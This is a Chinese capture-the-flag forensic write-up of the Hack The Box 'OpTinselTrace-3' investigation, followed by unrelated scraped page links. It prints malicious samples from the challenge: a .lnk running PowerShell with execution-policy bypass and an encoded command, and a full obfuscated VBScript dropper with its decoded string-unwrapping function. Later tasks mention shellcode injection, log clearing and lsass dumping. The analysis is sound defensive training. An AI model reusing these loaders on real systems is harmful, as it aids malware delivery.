【Sherlocks圣诞节特辑】htb OpTinselTrace-3 wp

TASK 1
What is the name of the file that is likely copied from the shared folder (including the file extension)?
可能从共享文件夹复制的文件的名称是什么（包括文件扩展名）？

TASK 2
What is the file name used to trigger the attack (including the file extension)?
用于触发攻击的文件名是什么（包括文件扩展名）？

TASK 3
What is the name of the file executed by click_for_present.lnk (including the file extension)?
click_for_present.lnk执行的文件的名称是什么（包括文件扩展名）？

TASK 4
What is the name of the program used by the vbs script to execute the next stage?
vbs 脚本用于执行下一阶段的程序名称是什么？

TASK 5 暂无

TASK 6
What is the URL that the next stage was downloaded from?
从哪个 URL 下载下一阶段？

TASK 7
What is the IP and port that the executable downloaded the shellcode from (IP:Port)?
可执行文件从中下载 shellcode 的 IP 和端口是什么（IP：Port）？

TASK 8
What is the process ID of the remote process that the shellcode was injected into?
注入 shellcode 的远程进程的进程 ID 是什么？

TASK 9
After the attacker established a Command & Control connection, what command did they use to clear all event logs?
攻击者建立命令和控制连接后，他们使用什么命令清除所有事件日志？

TASK 10
What is the full path of the folder that was excluded from defender?
从 Defender 中排除的文件夹的完整路径是什么？

TASK 11
What is the original name of the file that was ingressed to the victim?
侵入受害者的文件的原始名称是什么？

TASK 12 暂无

TASK 1
What is the name of the file that is likely copied from the shared folder (including the file extension)?
可能从共享文件夹复制的文件的名称是什么（包括文件扩展名）？

这题我蒙的因为我拖了所有的smb日志都没找到相关的…师傅们有可以找到共享文件夹的方式欢迎留言指教

看到用户桌面路径下有一个zip

TASK 2
What is the file name used to trigger the attack (including the file extension)?
用于触发攻击的文件名是什么（包括文件扩展名）？

~~这题我弱智了，朋友提醒才想起来dump解压zip~~

看文件内容第一个内容是

└─$ cat click_for_present.lnk 
P�O� �:i�+00�/C:\V1Windows@     ��.WindowsZ1System32B   ��.System32▒t1WindowsPowerShellT        ��.WindowsPowerShell N1v1.0:    ��.v1.0l2powershell.exeN    ��.powershell.exeTrick or treatB..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exep-ep bypass -enc JABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAI
AAiAEMAOgBcAFUAcwBlAHIAcwBcACIAIAAtAEYAaQBsAHQAZQByACAAIgBwAHIAZQBzAGUAbg
B0ACoALgB2AGIAcwAiACAALQBGAGkAbABlACAALQBSAGUAYwB1AHIAcwBlAHwAIABTAGUAbAB
lAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABG
AHUAbABsAE4AYQBtAGUAOwBjAHMAYwByAGkAcAB0ACAAJABmAGkAbABlAA==C:\Windows\Sy
stem32\shell32.dll�%SystemRoot%\System32\shell32.dll%SystemRoot%\System32
\shell32.dll�%�

                        �wN�▒�]N�D.��Q����      ��1SPS��XF�L8C���&�m�m.S-
                        1-5-21-3849600975-1564034632-632203374-1001

TASK 3
What is the name of the file executed by click_for_present.lnk (including the file extension)?
click_for_present.lnk执行的文件的名称是什么（包括文件扩展名）？

TASK 4
What is the name of the program used by the vbs script to execute the next stage?
vbs 脚本用于执行下一阶段的程序名称是什么？

看一下vbs的内容会发现是简单的混淆

Nonphilosophicalgloriat = LenB("Ritualizing") 
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Private Const Overcrammi = &HFFFFB15F
Private Const Rdkridtet = &HFFFFB96E
Private Const Delarbejdets = -19974
Private Const Sammentraengte = "Atokal Becram Latchkeys"
Private Const Tlleapparaternes = "Tropikfronters Udludningen Uigenkaldeliges122 Gunsels"
Private Const Dispergeringsmidlers = "Homostyled Tiltuskede"
Private Const Indlejrende = -36431
Private Const Iteratively = "Rhyptical Stetoskopers"
Private Const Spadillers = "Decursive consubstantialism"
Private Const Gemenheden136 = "Afstumpningens Elusiveness Encirclements"
Private Const kromosomernes = "fells Fastballs Laron"
Private Const Insures = "Forsvarlige ydernes Approachens"
Private Const Medianens = -11670
Private Const Udviklingspsykologerne = &HDCEC
Private Const Afrustet = "Ceded Prajene Linkages"
Private Const Hyperalgebra228 = &HFFFFB5B0
Private Const Overrapturize = -45841
Private Const Sandormene = 21903
Private Const Ravenhood = "Outwrites Negligibly"
Private Const Zara = -40317
Private Const Landsforeningers = &HFFFF612F
Private Const Spulings = 53917
Private Const Forfjerdinger = &HFFFF1B6F
Private Const Matus = -64522
Private Const omskrendes = &HFFFF2EBE
Private Const Udpolstringerne70 = &HFFFF4034
Private Const Grandmother241 = -15586
Private Const Studeopdrtters = -10206
Private Const Elisas = "Redeployment Leglet"
Private Const Panicking = "Seriously Noisiest"
Private Const Rdhud = 64782
Private Const Rebelly = "Absenteringers Paleodendrologic Stvfrakkernes Suspenderendes"
Private Const Davon = -62249
Private Const Korsfst = &HCEA8
Private Const Busstoppestederne = 52451
Private Const Undladtes = &HFFFFBCBF
Private Const Idiologism = -21819
Private Const Kokoromiko = &HFFFF0BF2
Private Const Skalken = &H8570
Private Const Stribningens = -8436
Private Const Synthesization = "Graags157 Helligtrekongers Lillefingrene"
Private Const Lydbaands = 63620
Private Const Omphalodia = -38461
Private Const Butyrousness = "Witting Blokhaandteringens"
Private Const chirogymnast = "Smsyning blackballed"
Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process")

Modulidae = "WScript." & "Shell"

Set Firklverne = CreateObject(Modulidae)

For Each objProcess in colProcess

    bb=instr(1,objProcess.Name,"s",vbTextCompare)
        if bb <> 0 then exit for

Next

Unrustling = mid(objProcess.Name,bb,1)
Aadselsbilles = "power" & Unrustling & "hell "

Tetrafluoridepr196 = Log(883567)
A4 = A4 + "sproglGRINCHg){"
superassociatepa = Right("Myriacanthous157",38)
A4 = A4 + "RINCHcs thst de"
Fulyiehasteindkaldel = MidB("Recirkulerede", 198, 100)
A4 = A4 + "dwelleGRINCH GR"
Momusesfarvefabr = Momusesfarvefabr & "Organbird" 
A4 = A4 + "spesed thn joyo"
Fyringsgasoliensyttendede = FormatDateTime("12/12/12")
A4 = A4 + "ut celebLatGRIN"
Voguishnesspencillersga = MidB("Nonsacredly", 5, 201)
A4 = A4 + "RINCHn$er holed"
while (Vrdihfteslarsonaandsviden<88)
Vrdihfteslarsonaandsviden = Vrdihfteslarsonaandsviden + 1
Fornyelsesbevgelseh = Fornyelsesbevgelseh * (1+1)
wend

Underkendelseskla = Rnd
A4 = A4 + "bsGRINCHmmGRINC"
Clodknockerfejlretableri = Now
A4 = A4 + "t GRINCHng up$d"
Sparkletmendiecri = Sparkletmendiecri & "Upjerk" & "Sakieh" 
A4 = A4 + ", lnd sGRINCHnu"
Lazarouswonderst = Split("Sanativeness")
A4 = A4 + "ked wGRINCHs lG"
Livsenergienssabbat = Right("Chics",67)
A4 = A4 + "esteve tranGRIN"
Hitchiestlailahsmiljmini = FormatPercent(4686710)
A4 = A4 + "CHtGRINCHonstal"
Fiberrigejordblonderme = "Janie" & "Lovering187" & "Bldersygdommene" 
A4 = A4 + "INCHon dGRINCHo"
Panelersbatturegensk = FormatNumber(812904)
A4 = A4 + "NCHag the towns"
Flyvekkkenernescocamamab = "Nilghais"
Flyvekkkenernescocamamab = Replace(Flyvekkkenernescocamamab,"Humdrumminess","Galilernes")
A4 = A4 + "RINCHpGRINCHt t"
Prosadigtetsundia = Prosadigtetsundia * 3889211 
A4 = A4 + ""
Renkulturenkopip = Split("Feeblebrained")
A4 = A4 + ""
Aflejretgnomologicaludm = Aflejretgnomologicaludm & "outcome" 
A4 = Replace(A4,"GRINCH","i")
Rostellariaholdarb = LCAse("Tevandskngts")
Firklverne.Run Aadselsbilles + Chr(34) + A4 + Chr(34),0

最后执行了Aadselsbilles + Chr(34) + A4 + Chr(34),0
需要关注Aadselsbilles

Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process")

Modulidae = "WScript." & "Shell"

Set Firklverne = CreateObject(Modulidae)

For Each objProcess in colProcess

    bb=instr(1,objProcess.Name,"s",vbTextCompare)
        if bb <> 0 then exit for

Next

Unrustling = mid(objProcess.Name,bb,1)
Aadselsbilles = "power" & Unrustling & "hell "

colProcess获取当前所有进程或者说Win32_Process的实例类

For Each objProcess in colProcess

    bb=instr(1,objProcess.Name,"s",vbTextCompare)
        if bb <> 0 then exit for

colProcess赋给objProcess ，然后变量bb获取当前进程名（objProcess.Name）中’s’字符的位置

Unrustling = mid(objProcess.Name,bb,1)
Aadselsbilles = "power" & Unrustling & "hell "

mid从index 1开始向后获取objProcess.Name偏移量bb的字符，也就是一个’s’
所以

Aadselsbilles="power" & 's' & "hell "

TASK 5
What is the name of the function used for the powershell script obfuscation?
用于混淆 powershell 脚本的函数名称是什么？

可以看到最后powershell执行的A4部分，A4也做了混淆所以对他进行筛选输出

└─$ grep 'A4' present.vbs 
A4 = A4 + "FunctGRINCHon W"'Hypogee Stvknaps Polarimeters Tritanopic Brunroden
A4 = A4 + "rapPresent ($En"'Mirepoix250 Resoluttes Ansvarligere
A4 = A4 + "sproglGRINCHg){"
A4 = A4 + "$NrGRINCHngsvGR"'Servietters Tvelys Pillernes
A4 = A4 + "INCHrksomhedern"'Skraastribedes Raadighedsbelbet Nitrere Gruppere
A4 = A4 + "es = $EnsproglG"'Nedjustere Rgerrigheder Yellowfish145
A4 = A4 + "RINCHg.Length-1"'Lyssignalet Collegers
A4 = A4 + "; For ($SmGRINC"'Tillidsfuld Zap188
A4 = A4 + "Hths211=6; $SmG"'Tyvagtigt Sanitetsmestre Riverbush Tresche
A4 = A4 + "RINCHths211 -lt"'Krestens Relateret
A4 = A4 + " $NrGRINCHngsvG"'Svampekostenes Afleverede121 Martyrminernes ungkreaturer
A4 = A4 + "RINCHrksomheder"'Supercargoship Festprogrammerne Ratakslens
A4 = A4 + "nes){$MalGRINCH"'Bootjack211 Unsinuate Giacobo Lasters Melancholious
A4 = A4 + "ce=$MalGRINCHce"'unrelentor Ducklar Kalendarium Beundrerindernes
A4 = A4 + "+$EnsproglGRINC"'Postprojekt86 Bygningselementers Blackening Abildhj
A4 = A4 + "Hg.SubstrGRINCH"'Spillway Antarktis Libyske
A4 = A4 + "ng($SmGRINCHths"'Bugtalernes Demissioneret Uflsomme
A4 = A4 + "211, 1);$SmGRIN"'Trimesinic Flyvepladsen
A4 = A4 + "CHths211+=7;}$M"'Diazotize Riffelgang
A4 = A4 + "alGRINCHce;};$p"'Moderselskabernes Yngledygtigere Floorings Plastvarens
A4 = A4 + "resent=WrapPres"'Phthisiology Acetphenetidin Senatorernes ethyl
A4 = A4 + "ent 'Once uhon "'Wilda Diversifiable Attracts teknologs Privatissime
A4 = A4 + "a ttme, GRINCHn"'Blgelinie Museflderne Borgersind171 Udbytningens
A4 = A4 + "tthe whpmsGRINC"'Beauty Hklenaalens Frsningen
A4 = A4 + "Hcal:town o/ Ho"'Sowbug Indvaaneres Anemopsis Musikprogram Vestkysterne
A4 = A4 + "lGRINCHd/y Holl"'Navellike Ileocolic Kultivatoren Redemptive Radiatory
A4 = A4 + "7w, the7e lGRIN"'Firemaster Anfordringskontos Isomorphisms
A4 = A4 + "CHve. two l7gen"'Septiferous Myrs27 Padle Sheaflike
A4 = A4 + "dar4 fGRINCHgur"'Frousy Seksdageslbenes
A4 = A4 + ".s know1 far a9"'Cykelryttere Frankeringens207 Convulsed
A4 = A4 + "d wGRINCHde8 th"'Pedanteriets Underfundighederne
A4 = A4 + "e G.GRINCHnch a"'Bargeman Deflected141
A4 = A4 + "5d Sant2 Claus/"'Terminalknudens16 companator Nattekvarter
A4 = A4 + " They desGRINCH"'Malacopodous Unincantoned
A4 = A4 + "dedeon oppssGRI"'Satisfaktionernes Diagnostisk
A4 = A4 + "NCHte stdes ofr"'Udstykkernes Brndvidderne Aflsningens
A4 = A4 + "the toon, eacy "'Excommunicant Bargaining
A4 = A4 + "wGRINCHth _heGR"'Corinnes Interparlamentarisk Tubaerne Frekvenskomponenternes Rokketands
A4 = A4 + "INCHr ocn unGRI"'Retraversing Philosophicopsychological
A4 = A4 + "NCHqhe charrcte"'Datacenter ruineredes Trapez Rag90
A4 = A4 + "rGRINCHsGRINCHG"'Geometrid177 Bindle
A4 = A4 + "RINCHcs thst de"
A4 = A4 + "fGRINCHted them"'Crinkles traktorens Tvisters Stedtillgget
A4 = A4 + ". The arGRINCHn"'Srinteresseomraadernes Ormegaardenes
A4 = A4 + "ch,sa solGRINCH"'Tiltningens Tyromancy Tandbrstnings
A4 = A4 + "/ary creature,v"'dataerklringerne Langel Rickettsiales Oprullede Strandgrunden
A4 = A4 + "dwelleGRINCH GR"
A4 = A4 + "INCHn a lave at"'Skelter Combusting
A4 = A4 + "_p Mounp Crumpr"'Virussernes Bahrains Uninvestigated
A4 = A4 + "t. WGRINCHte hG"'anoli Pantellerite Associableness
A4 = A4 + "RINCHs gseen fu"'Alloker Bevogtnings Panserglasrude Synnves
A4 = A4 + "e and anheart t"'Ophjningen bortfjernelser Unlighted
A4 = A4 + "eemGRINCHng.y t"'Ruledom Exship Favoriserende
A4 = A4 + "wo jGRINCHzes t"'Kalk Efterlnner Udbldning88
A4 = A4 + "po smalg, he h'"'Bepuddle Overfiske Vekselstrmmenes
A4 = A4 + ";$gluhweGRINCHn"'Reagensglasbarns Printerjob Proctored
A4 = A4 + "=WrapPresent 'd"'Blomsterrige Zamboer Tomahawks136
A4 = A4 + " a peGRINCHchan"'Modstandsgruppes Anglomaner Cyanogenamide Sluddet118
A4 = A4 + "t eor mGRINCHsx"'Dengang Forhandlingsklimas Anagrammatisation Furling Anisodont
A4 = A4 + "hGRINCHef a';. "'Fireaarsdrengen Peins Svejseflammerne Ambitendency haardnakkedes
A4 = A4 + "($gluhweGRINCHn"'Acinetinan Niais
A4 = A4 + ") (WrapPresent "'Statsskattedirektoraternes Udlevede162 Blegnings Polydispersity
A4 = A4 + "'d a dGRINCH$da"'Sulphocarbolic bert Costumiers
A4 = A4 + "GRINCHn fpr any"'Galvanised Stningsbloks Cabirian49 Grnsestationen
A4 = A4 + "teGRINCHng fert"'traject Several116 Traumatiser
A4 = A4 + "GRINCHve. se de"'Slaggers236 Arbejdsstykker Dillseed Ranva226
A4 = A4 + "spesed thn joyo"
A4 = A4 + "ut celebLatGRIN"
A4 = A4 + "CHonsothat echo"'lavmaalet Nabonulpunkters Sapromic kvdernes
A4 = A4 + "ed tarough the "'Buffistens Paychecks stablemen Indremissionsk cryptolunatic
A4 = A4 + "towGRINCH, espe"'Affaldsskakten Aquiparous Brnesikrings
A4 = A4 + "oGRINCHally nur"'Trinlse Spejdende Sangkoret Styrkegrad unsensualise
A4 = A4 + "GRINCHng =he wG"'Regimer Udspar Balkan137
A4 = A4 + "RINCHn$er holed"
A4 = A4 + "ays. nn the vth"'Deerberry Sregn Chebacco Gunfighter
A4 = A4 + "er s:de of tolG"'Blackamoors Unsugared Menstruation41 Cytochylema Opkrvningsgebyret
A4 = A4 + "RINCHdayeHollow"'Immatrikulecr Parafraseret Fratrdelses Othilies Tandteknikers
A4 = A4 + "m nestlpd GRINC"'Foldstool Spongeless Importere144
A4 = A4 + "Hn ac');$FGRINC"'Astronautic oxyderingen Chappies89 energiudladningerne ivars
A4 = A4 + "Hle=WrapPresent"'Speaketeksternes Stenansigternes Totty Superintendential
A4 = A4 + " 'cozy w\rkshop"'Continuingly Vaebnerrang Oarless Kashmirens
A4 = A4 + "pat therNorth e"'Husmandskone Hardwares Kommunalbestyrelser
A4 = A4 + "ole, lsved the "'Sagoens Overarbejderne Alexius75
A4 = A4 + "jollynand betev"'subcutaneous Rekonvalesceret Makroredigeringerne
A4 = A4 + "olen. SantaeCla"'Borggaardene Doggerelism Folkemusiks
A4 = A4 + "us.xWGRINCHth h"'Josephus Anbefalendes Textuality Cosmus Monogynious
A4 = A4 + "es roun';. ($gl"
A4 = A4 + "uhweGRINCHn) (W"'Galileis Jernstberierne Slappelsers pst
A4 = A4 + "rapPresent ' be"'Inanely Dgnkiosk Cementmaker Borden
A4 = A4 + "lly$ rosy pheek"'Jointwood Artificial Hornlike Unidealistically160
A4 = A4 + "s,eand a reart "'Prorektor Oxshoe Outshowed Dataselskabets
A4 = A4 + "bsGRINCHmmGRINC"
A4 = A4 + "HngewGRINCHth k"'Maksimmrr Prodition Nonchronical Paatrngende Antagonisers
A4 = A4 + "nndnesst he spL"'Angakokker136 Rehandles Barramunda
A4 = A4 + "nt hGRINCHsoday"'Admissive Fortifys
A4 = A4 + "s ccaftGRINCHng"'Narcos Lambitive
A4 = A4 + "atoys ftr chGRI"'Handlike Hypnotiserendes
A4 = A4 + "NCHlGRINCHren a"'Krydsmissilet30 Wolfen Clappered Ditetik
A4 = A4 + "round thn world"'Quadrilogy Ansa Deflationens
A4 = A4 + "=and sp$eadGRIN"'Amortization Snoringly
A4 = A4 + "CHngpcheer eher"'Radiologiens Palestra Kondicykels Velegnet skryderens
A4 = A4 + "ever he west. Y"'Cammed Maitressens Brancheanalysen Giolitti
A4 = A4 + "eae afternyear,"'Mensurations57 Elitre103 Ocarina Colymbriformes37 bestver
A4 = A4 + " ts the LolGRIN"'Lemur Rvrendt Folklorister vigepligtige Repacked
A4 = A4 + "CHdayoseasoncap"'Underbelyst Blotchier Swinery
A4 = A4 + "proaahed, tte t"'Perturbedness Snydeblusens Reagenset Trillingefdsel
A4 = A4 + "ownGRINCHfolk e"'Bicepserne Spejderhaglene staalvrksarbejders Heterodoxness
A4 = A4 + "ogerly nrepare+"'snnikens Halvaarlige Loupcerviers
A4 = A4 + " for f$stGRINCH"'Gennemprygling Unisonance
A4 = A4 + "vGRINCHtFes, ad"'Gjalt Autentificeringerne
A4 = A4 + "GRINCHrnGRINCHn"'Orthodoxal Sprightfulness Fagforeningskomiteer220 Teleophyte Oversecured
A4 = A4 + "g lhe streets w"'Devouringly Towelette121 borogove Lavvandstand Londonsk
A4 = A4 + "GRINCHh');. ($g"'Callower Overphilosophize eksport
A4 = A4 + "luhweGRINCHn) ("'Cangle Tripot
A4 = A4 + "WrapPresent 'h "'pulsaarers Rulleskjters
A4 = A4 + "lGRINCHgh.s, se"'Subvariety Sopite67 Nonrecessive
A4 = A4 + "t GRINCHng up$d"
A4 = A4 + "ecoragGRINCHons"'Usundt protectively Trepanation Opfordrings14 Naiades63
A4 = A4 + ", lnd sGRINCHnu"
A4 = A4 + "GRINCHng johful"'Nattetiderne165 Hyttefadenes pupfish Vesicle Vulkaniserendes
A4 = A4 + " tuwes. Whele S"'Makulere oksekdet uvenskabeligt
A4 = A4 + "anGRINCHa busGR"'Vrn Forskelsbehandling Indlaansordningers Overtalelseskunsten
A4 = A4 + "INCHny prep red"'Metabular Propagandists Brnetestamenters Fortovsparkeringernes Revelsbens
A4 = A4 + " hGRINCH( sleGR"'Tjekkene Varmekilden
A4 = A4 + "INCHgN and ceec"'eksplodere Knlendes Elsket
A4 = A4 + "ked wGRINCHs lG"
A4 = A4 + "RINCHs- twGRINC"'Katacrotism Macrodactylous unsustained Haderslev
A4 = A4 + "HceO the GbGRIN"'Parables Strobing Televrks
A4 = A4 + "CHnch sjethed e"'Talekanalerne Pegepinden Historiebogen Majuscules shellmonger
A4 = A4 + "n hGRINCHs cave"'Deklamationsnummerets Pyroglazer Generere Resurrectioner
A4 = A4 + ", GRINCHtrGRINC"'Sulphinate Sjllst
A4 = A4 + "Htate  by thn m"'Vollenge Forebitter Mallorcineren Tiptipoldemdre Misidentified
A4 = A4 + "errGRINCHeent t"'Sakkede Stemmeseddelen Softwareudviklings Spritfabrikantens Skyggeboksningernes
A4 = A4 + "htt fGRINCHll.d"'Woollies Brnefri Pbs
A4 = A4 + " the wGRINCHr. "'Organs Sociolingvistikken Urtekosten Shanker Besrgendes
A4 = A4 + "One fatefbl wGR"'Remoote Labilizations Cumhal Underzealously154
A4 = A4 + "INCHntcr, a plr"'Fejemget materialistisk Dogmatists Bents Heraldiker
A4 = A4 + "tGRINCHculGRINC"'Overspunden Heteroclitica Pamperos Becowards77 Fjases
A4 = A4 + "Hrly GRINCHce c"'Geomorphogeny Embrawn Barber
A4 = A4 + "hGRINCHllnswept"'Sankedes Tkkehalm
A4 = A4 + " through)HolGRI"'twafauld Smelterman Hypotekbanks
A4 = A4 + "NCHda. HolloD, "'Ajstrups takkebnner
A4 = A4 + "causong chaws a"'Lam Afmystificeredes Brnefngsel Kaias
A4 = A4 + "nd nGRINCHsrupt"'Zitherist Tyndstegsfilet Prominently Overnicely Quibus
A4 = A4 + "lng theoholGRIN"'Aabent Flaughts Turbiner Sammentllings21
A4 = A4 + "CHdaa spGRINCHr"'sporstofferne Intervaled Dilly Sinneds
A4 = A4 + "GRINCHd. The Fn"'Gambone Underset Terebridae
A4 = A4 + "owstoGRINCHms g"'Kammesjukkens Bavaria Skider Underkursen Ndendes
A4 = A4 + "rel wGRINCHldee"'Talismanens Mondego Embrave
A4 = A4 + ", and (he tow$s"'Nonstability Skrivesituation
A4 = A4 + "folk ptrugglrd "'Trunnion16 Hyperhedonia salgsudviklings Starutternes
A4 = A4 + "to keep thesr f"'Sygeplejeassistenterne Untraceableness Elodeaceae Costar129 Survivalists249
A4 = A4 + "esteve tranGRIN"
A4 = A4 + "CHtGRINCHonstal"
A4 = A4 + "GRINCHve.,ChGRI"'Windscreen Domineredes Lays Anguineous
A4 = A4 + "NCHldr$n werepd"'Troldende Lisente
A4 = A4 + "GRINCHsappeGRIN"'Kloning Ibidem Subdelegating
A4 = A4 + "CHnted rs the s"'Hydrometeorologist Geometriers
A4 = A4 + "rospece of a no"'Theocrasy Arsenicalism Enkeltradet
A4 = A4 + "yous telebraLGR"'Lues Sinonism Strmhvirvlens
A4 = A4 + "INCHon dGRINCHo"
A4 = A4 + "med. WctnessGRI"'Slknings Lakfarver
A4 = A4 + "NCHag the towns"
A4 = A4 + " dGRINCHstresso"'Coelibat Sprogfrdighedens
A4 = A4 + " Santanknew h) "'Urgeringers Druery Composersatsers30 Verdensmagts Overstaffing
A4 = A4 + "had t; do soe')"'Unweighting Raastofferne
A4 = A4 + ";. ($gluhweGRIN"'Poletters Ddc Skumplaster
A4 = A4 + "CHn) (WrapPrese"'Diopsidae afmagringskures Ttnede55 Javaneres
A4 = A4 + "nt 'ethGRINCHng"'Lokkers Revoltingly Erfaringsvidenskab
A4 = A4 + "Sto restore tha"'Columbier Strithaarets Alexandrianism
A4 = A4 + " holGRINCHdry c"'Vulkanernes Oprrsgruppen Subedited Cutty
A4 = A4 + "heet. WGRINCHth"'Unemendable Destillerapparaters Forelskelses
A4 = A4 + "-a twGRINCHnPle"'Gteskabslignende Dagsordener
A4 = A4 + " GRINCHn rGRINC"'Meteorologies Grafologer Conversional
A4 = A4 + "Hs eyeoand a ce"'Antropologi Krusningens Sliknes34
A4 = A4 + "art fell of sop"'Unhawked Ufattelighed Stubrunner
A4 = A4 + "e, hs decGRINCH"'Foldboat Ishockey Lalle remark Dockise
A4 = A4 + "d d to p$y a vG"'Omsorgscentrenes Unchaffing Redenigrate sortmejses Profounder83
A4 = A4 + "RINCHpGRINCHt t"
A4 = A4 + "o ehe GrGRINCHr"'Thorups Passagerskibets Skitsering Scalt Genetor
A4 = A4 + "ch, hosGRINCHng"'Dactylopore Cologners Unilaterales
A4 = A4 + " toewarm hns he"'Republicanises Perthosite Springbalsaminers
A4 = A4 + "art and bLGRINC"'Azrael Traadningslister
A4 = A4 + "Hng baok the cp"'lstykke Treblet
A4 = A4 + "GRINCHrGRINCHt "'Ostentatious Tunfiskene Otter
A4 = A4 + "af the teason.G"'Organisationslinies Kiasmernes
A4 = A4 + "RINCHGuGRINCHde"'ratio Succinctoria Praedikatomdoebning
A4 = A4 + "doby hGRINCHsnu"'Skansekldningernes Dramme Kommunikationsbehovs
A4 = A4 + "nyGRINCHel;GRIN"'Udvandringens Homopati Specifiability Syslen Hydrophytism
A4 = A4 + "CH');"'Liberaliseringerne Dth Stolpesengens Uforstilt Pollux
A4 = A4 + ""'Sikkerhedsstillelsernes Indfrings Kilders Trolddomsevne
A4 = A4 + ""
A4 = A4 + ""'Arbejderungens Mbelfabrikkerne
A4 = A4 + ""'Tepehuane239 Enmeshes
A4 = A4 + ""
A4 = Replace(A4,"GRINCH","i")

这里用vbs直接打印也ok
不过我选择替换’为#之后打印，就可以看到函数了

Function ****** ($Ensproglig){$Nringsvirksomhedernes = 
$Ensproglig.Length-1; For ($Smiths211=6; $Smiths211 -lt 
$Nringsvirksomhedernes){$Malice=$Malice+$Ensproglig.Substring($Smiths211, 
1);$Smiths211+=7;}$Malice;};$present=WrapPresent #Once uhon a ttme, 
intthe whpmsical:town o/ Holid/y Holl7w, the7e live. two l7gendar4 
figur.s know1 far a9d wide8 the G.inch a5d Sant2 Claus/ They desidedeon 
oppssite stdes ofrthe toon, eacy with _heir ocn uniqhe charrcterisiics 
thst defited them. The arinch,sa soli/ary creature,vdwellei in a lave 
at_p Mounp Crumprt. Wite his gseen fue and anheart teeming.y two jizes 
tpo smalg, he h#;$gluhwein=WrapPresent #d a peichant eor misxhief a#;. 
($gluhwein) (WrapPresent #d a di$dain fpr anyteing fertive. se despesed 
thn joyout celebLationsothat echoed tarough the towi, espeoially nuring 
=he win$er holedkshoppat therNorth eole, lsved the jollynand betevolen. 
SantaeClaus.xWith hes roun#;. ($gluhwein) (WrapPresent # belly$ rosy 
pheeks,eand a reart bsimmingewith knndnesst he spLnt hisodays 
ccaftingatoys ftr chiliren around thn world=and sp$eadingpcheer eherever 
he west. Yeae afternyear, ts the Lolidayoseasoncapproaahed, tte townifolk
 eogerly nrepare+ for f$stivitFes, adirning lhe streets wih#);. 
 ($gluhwein) (WrapPresent #h ligh.s, set ing up$decoragions, lnd sinuing
  johful tuwes. Whele Sania businy prep red hi( sleigN and ceecked wis 
  lis- twiceO the Gbinch sjethed en his cave, itritate  by thn merrieent
   thtt fill.d the wir. One fatefbl wintcr, a plrticulirly ice 
   chillnswept through)Holida. HolloD, causong chaws and nisruptlng 
   theoholidaa spirid. The Fnowstoims grel wildee, and (he tow$sfolk 
   ptrugglrd to keep thesr festeve tranitionstalive.,Childr$n 
   werepdisappeinted rs the srospece of a noyous telebraLion diomed. 
   Wctnessiag the towns distresso Santanknew h) had t; do soe#);. 
   ($gluhwein) (WrapPresent #ethingSto restore tha holidry cheet. With-a 
   twinPle in ris eyeoand a ceart fell of sope, hs decid d to p$y a vipit 
   to ehe Grirch, hosing toewarm hns heart and bLing baok the cpirit af 
   the teason.iGuidedoby hisnunyiel;i#);

TASK 6
What is the URL that the next stage was downloaded from?
从哪个 URL 下载下一阶段？

对上一个脚本的行为进行监测即可
或者丢shell里跑一下也行

TASK 7
What is the IP and port that the executable downloaded the shellcode from (IP:Port)?
可执行文件从中下载 shellcode 的 IP 和端口是什么（IP：Port）？

找到一个上一步解密后会得到名字的exe，然后再file中找到dump，re一下会看到地址。

这里inet_pton() 是用于将字符串形式的 IP 地址转换为网络地址结构，
2 表示存储是 IPv4 地址
paddrbuf.sa_data[2]是指向目标存储位置的指针

下面的paddrbuf.sa_data用于存储地址信息的字段，这里其实就是端口号，后面的htons将其中的由16进制转换成大端的网络字节序。

TASK 8
What is the process ID of the remote process that the shellcode was injected into?
注入 shellcode 的远程进程的进程 ID 是什么？

创建了一个系统进程快照,然后从上方开始搞

这里循环while有个对比，下面有个打开进程，猜测应该是在找进程注入。
看下
的值是svchost.exe进程，从头匹配所以找个最靠前的并且调用了ntd.lld的
但是有两个其实，所以需要看下有哪个外联

或者朋友提供的思路windows.malfind.Malfind

TASK 9
After the attacker established a Command & Control connection, what command did they use to clear all event logs?
攻击者建立命令和控制连接后，他们使用什么命令清除所有事件日志？

翻Windows PowerShell.evtx日志

TASK 10
What is the full path of the folder that was excluded from defender?
从 Defender 中排除的文件夹的完整路径是什么？

看Defender Operational.evtx日志

TASK 11
What is the original name of the file that was ingressed to the victim?
侵入受害者的文件的原始名称是什么？

这个题很模糊，没有明确的说出是哪个文件，不过就他的措辞来看有两种可能：
1、文件名在受害者电脑上时被修改过
2、在传入受害者电脑前就修改过

这道题如果之前TASK9时，没翻看每一条Windows PowerShell日志的话基本坐牢了，有看过日志的应该有印象，其中一条power shell将一个看似是用户自己写的.exe带参加载了

但是很奇怪的他引入了lsass.exe以及微软的准许参，有相同参数及使用方法的工具只有一个。

TASK 12
What is the name of the process targeted by procdump.exe?
******.exe 目标进程的名称是什么

你说呢~

你可能感兴趣的:(linux,安全)

浪潮 M5系列服务器IPMI无法监控存储RAID卡问题. Songxwn 硬件服务器服务器运维
简介浪潮的M5代服务器，可能有WebBMC无法查看存储RAID/SAS卡状态的情况，可以通过以下方式修改。修改完成后重启BMC即可生效。ESXiIPMITools使用：https://songxwn.com/ESXi8_IPMI/（Linux也可以直接使用）Linux/ESXiIPMITool下载：https://songxwn.com/file/ipmitoolWindows下载：https:/
unblock with ‘mysqladmin flush-hosts‘ 解决方法祈祷平安,加油数据库常见问题 oracle 数据库
MySqlHostisblockedbecauseofmanyconnectionerrors;unblockwith'mysqladminflush-hosts'解决方法环境：linux，mysql5.5.21错误：Hostisblockedbecauseofmanyconnectionerrors;unblockwith'mysqladminflush-hosts'原因：同一个ip在短时间内产
信任饮冰伊乔
随着社会的发展，微信和支付宝交易给人们带来了极大的方便，越来越多的人出门都只选择拿一部手机即可，方便安全，可昨天我就遇到了一件比较尴尬的事。昨天傍晚，我从公司出来，感觉有点饿，决定索性吃了饭再回去，来到去过几次的一个店里，如往常一样叫了餐，当时店里吃饭的不多，老板麻利的先去做了，正要扫微信付账的时候发现手机没电了，迷之尴尬，我只好跟老板说不用做了，手机没电了，我身上又没现金，付不了帐了。老板娘很热
1.计算机处理器架构+嵌入式处理器架构及知识 vv 啊 arm-linux学习 linux 系统架构
